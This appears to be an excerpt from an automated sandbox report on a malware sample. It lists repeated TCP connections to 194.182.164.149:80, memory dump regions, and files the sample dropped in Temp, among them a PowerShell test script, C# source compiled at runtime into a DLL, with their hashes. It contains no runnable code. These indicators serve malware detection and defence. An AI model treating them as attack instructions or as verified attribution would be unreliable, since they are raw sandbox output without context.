| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
Files
memory/1516-4-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-3-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-1-0x00007FF88648D000-0x00007FF88648E000-memory.dmp
memory/1516-0-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-2-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-7-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-6-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-5-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-10-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-11-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-9-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-12-0x00007FF844410000-0x00007FF844420000-memory.dmp
memory/1516-8-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-13-0x00007FF844410000-0x00007FF844420000-memory.dmp
memory/1516-14-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-17-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-16-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-18-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-15-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-28-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-27-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yqwjavry.nki.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3924-36-0x000001E3FAB30000-0x000001E3FAB52000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline
| MD5 | 3e174c33287fbd83920a12442c4d0a4d |
| SHA1 | cd0ffea739bfc65ed49524a86e2af800e40a2fb3 |
| SHA256 | 4aafc0e3444dfa58b4a5ae2fdbdd52ceb742b9f2dc4f16310dbd116a698b60f1 |
| SHA512 | 5052d3205b006f65f5911e6053619f03f0dd1dc4e13393dad19944a5aaf59dcb9a0729ac42ac51fad9ac236c861d74fc1d1c1f35723dbcd7cfae0d4fa0356b4f |
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP
| MD5 | 7b9a81e634a234ab28f3b53fcb3526f1 |
| SHA1 | 7a627ae55d53dc0ea53677e93cf2fda70dfe0fed |
| SHA256 | 06a87569b6882f9308573fc517204028ae2d4b1bd82d3c7bad321b141ed0cd12 |
| SHA512 | 00e36f5f09d80dff7f027345a13c16edb303fb27333ad32c6208db61a3e5182a44a63cfec4b66abaaf7ad0ebd1d9d2ff954b18d4fa023d61e2116aa60ed6c0b6 |
C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp
| MD5 | 7778d4e820e391232ea60fa3873fdd89 |
| SHA1 | fd3b5d53047bf4c1a5f16560ebc41d66a6ff13d6 |
| SHA256 | b5cdf462a9a28fc0b065c10f5451c926eecf128532d99fd436e4f9664b5964de |
| SHA512 | d4fbbb0faa605335ebd640fa6e12adb337e05d97e43a52ad57409514cf7cb10b95f1efe542a2d687534444cba9b94b210ed845680a7bd87b4008b477303aa231 |
C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.dll
| MD5 | 856cf077c25c603f01aeb7dadd5f753e |
| SHA1 | ce9d50265de193cdde5ec84d25bc2819dc5b8ed2 |
| SHA256 | a8c38cd2026cdc21d43e8c1ae6fe2bf36c8c42b5ef1149b2717933d656454cf8 |
| SHA512 | 9962dcd4d55abac42bfaa94beaf867b2c205987e6c8906988c81cd2cee7471c5aafb7163743c3c8fe52598f764f49a0fc88ed9b2bbb0b57984b175816baa0aa9 |
memory/3924-56-0x000001E3FAB20000-0x000001E3FAB28000-memory.dmp
memory/1516-60-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-61-0x00007FF88648D000-0x00007FF88648E000-memory.dmp
memory/3924-62-0x000001E3FB440000-0x000001E3FBEBE000-memory.dmp
memory/3924-65-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-66-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-64-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/3924-63-0x000001E3FC940000-0x000001E3FD426000-memory.dmp
memory/1516-67-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | b7039431a29d664ae0a6e28d2a030a7a |
| SHA1 | b8c9192498057085b130146ea17775b3baf32dbf |
| SHA256 | d860cc29eceb19347215999a95032a3cf5d4cbc8b7cf95059f6ea8d44dd25c64 |
| SHA512 | 3794a5bc89a56f7168caea9b9ba95fbda1ad56714d3e3dc69659c794aa738df0519d68812564dda50e819c97887546c65a76791205b042f1df17f4bbc8536d4d |
memory/3924-76-0x000001E3FC940000-0x000001E3FD426000-memory.dmp